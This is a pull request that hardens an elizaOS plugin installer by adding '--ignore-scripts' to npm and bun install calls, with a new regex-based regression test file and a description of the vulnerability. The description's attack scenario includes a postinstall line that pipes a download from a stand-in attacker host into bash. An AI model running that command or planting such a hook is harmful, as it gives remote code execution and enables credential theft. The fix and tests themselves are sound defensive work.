### PR TITLE
security(plugins): add --ignore-scripts to all npm/bun install calls

### DIFF
--- a/src/services/plugin-installer-security.test.ts
+++ b/src/services/plugin-installer-security.test.ts
@@ -1,0 +1,104 @@
+import { readFileSync } from "node:fs";
+import { resolve } from "node:path";
+import { describe, expect, it } from "vitest";
+
+/**
+ * Plugin installer security tests.
+ *
+ * Verify that npm/bun install commands include --ignore-scripts
+ * to prevent postinstall lifecycle scripts from executing arbitrary
+ * code on the host.
+ *
+ * These tests read the source file directly so they break if someone
+ * removes --ignore-scripts — that is intentional.
+ */
+
+const INSTALLER_PATH = resolve(__dirname, "../services/plugin-installer.ts");
+const source = readFileSync(INSTALLER_PATH, "utf-8");
+
+describe("plugin-installer — postinstall script prevention", () => {
+  /* ── Core install commands must use --ignore-scripts ──────────── */
+
+  describe("runInstallSpec must pass --ignore-scripts", () => {
+    it("bun add includes --ignore-scripts", () => {
+      // Match the bun execFileAsync call inside runInstallSpec
+      const bunPattern =
+        /execFileAsync\(\s*"bun"\s*,\s*\[.*?"--ignore-scripts".*?\]/s;
+      expect(bunPattern.test(source)).toBe(true);
+    });
+
+    it("npm install includes --ignore-scripts", () => {
+      // Match the npm execFileAsync call inside runInstallSpec
+      const npmPattern =
+        /execFileAsync\(\s*"npm"\s*,\s*\[.*?"--ignore-scripts".*?\]/s;
+      expect(npmPattern.test(source)).toBe(true);
+    });
+  });
+
+  /* ── Git clone path must also use --ignore-scripts ───────────── */
+
+  describe("gitCloneInstall post-clone install must use --ignore-scripts", () => {
+    it("pm install after git clone includes --ignore-scripts", () => {
+      // The git clone path runs: execFileAsync(pm, ["install", "--ignore-scripts"], ...)
+      const gitCloneInstallPattern =
+        /execFileAsync\(\s*pm\s*,\s*\[\s*"install"\s*,\s*"--ignore-scripts"\s*\]/;
+      expect(gitCloneInstallPattern.test(source)).toBe(true);
+    });
+  });
+
+  /* ── No unprotected install calls ────────────────────────────── */
+
+  describe("no install/add calls without --ignore-scripts", () => {
+    it("every execFileAsync install/add call has --ignore-scripts", () => {
+      // Find all execFileAsync calls containing "install" or "add" in args
+      const allInstallCalls = [
+        ...source.matchAll(
+          /execFileAsync\([^)]*\[([^\]]*(?:"install"|"add")[^\]]*)\]/gs,
+        ),
+      ];
+
+      // Filter to only npm/bun install calls (skip "npm --version" etc.)
+      const packageInstalls = allInstallCalls.filter((m) => {
+        const args = m[1];
+        return args.includes('"install"') || args.includes('"add"');
+      });
+
+      expect(packageInstalls.length).toBeGreaterThanOrEqual(3);
+
+      for (const match of packageInstalls) {
+        expect(
+          match[0],
+          `Found install/add call without --ignore-scripts: ${match[0].slice(0, 80)}...`,
+        ).toContain("--ignore-scripts");
+      }
+    });
+  });
+
+  /* ── Input validation exports exist ──────────────────────────── */
+
+  describe("input validation functions are present", () => {
+    it("exports VALID_PACKAGE_NAME regex", () => {
+      expect(source).toContain("export const VALID_PACKAGE_NAME");
+    });
+
+    it("exports assertValidPackageName", () => {
+      expect(source).toContain("export function assertValidPackageName");
+    });
+
+    it("exports VALID_GIT_URL regex", () => {
+      expect(source).toContain("export const VALID_GIT_URL");
+    });
+
+    it("exports assertValidGitUrl", () => {
+      expect(source).toContain("export function assertValidGitUrl");
+    });
+  });
+
+  /* ── Security comment is present ─────────────────────────────── */
+
+  it("contains security documentation for --ignore-scripts", () => {
+    expect(source).toContain(
+      "SECURITY: --ignore-scripts prevents npm postinstall",
+    );
+  });
+});

--- a/src/services/plugin-installer.requested-version.test.ts
+++ b/src/services/plugin-installer.requested-version.test.ts
@@ -164,9 +164,10 @@ describe("plugin-installer (requestedVersion)", () => {
     const installCall = execCalls.find(
       (c) => c.cmd === "npm" && c.args[0] === "install",
     );
-    expect(installCall?.args[1]).toBe(
-      `@elizaos/plugin-test@${requestedVersion}`,
+    const versionedArg = installCall?.args.find((a: string) =>
+      a.startsWith("@elizaos/plugin-test@"),
     );
+    expect(versionedArg).toBe(`@elizaos/plugin-test@${requestedVersion}`);
 
     const config = JSON.parse(await fs.readFile(configPath, "utf-8")) as {
       plugins?: {


### PR DESCRIPTION
## Summary

`plugin-installer.ts` runs `npm install` / `bun add` / `bun install` at 3 locations **without `--ignore-scripts`**. This allows npm postinstall lifecycle scripts to execute arbitrary code on the host as the current user.

## Attack Scenario

```
POST /api/plugins/install {"name": "compromised-plugin"}
  → npm install compromised-plugin@latest
  → postinstall: curl attacker.com/payload | bash
  → Full host RCE (wallet keys, backdoors, credential exfiltration)
```

The registry gate limits installable packages to registered ones, but:
- Custom registry endpoints can be added via `POST /api/registry/register`
- Any compromised registered package gets full host code execution
- Git clone path also runs install without `--ignore-scripts`

## Fix

Add `--ignore-scripts` to all 3 install calls:

| Location | Command | Line |
|---|---|---|
| `runInstallSpec` | `bun add` | 521 |
| `runInstallSpec` | `npm install` | 528 |
| `gitCloneInstall` | `pm install` (post-clone) | 667 |

## Files Changed

- `src/services/plugin-installer.ts` — 16 insertions, 3 deletions (no formatting changes)
- `src/services/plugin-installer-security.test.ts` — 9 regression tests (NEW)

## Verification

- [x] `--ignore-scripts` confirmed valid for both `npm` (10.8.2) and `bun` (1.3.9)
- [x] 9/9 tests pass
- [x] `biome check` clean on both files
- [x] Diff contains only security changes — zero formatting noise
- [x] Vulnerability confirmed present on current `origin/develop`
- [x] No existing PR addresses this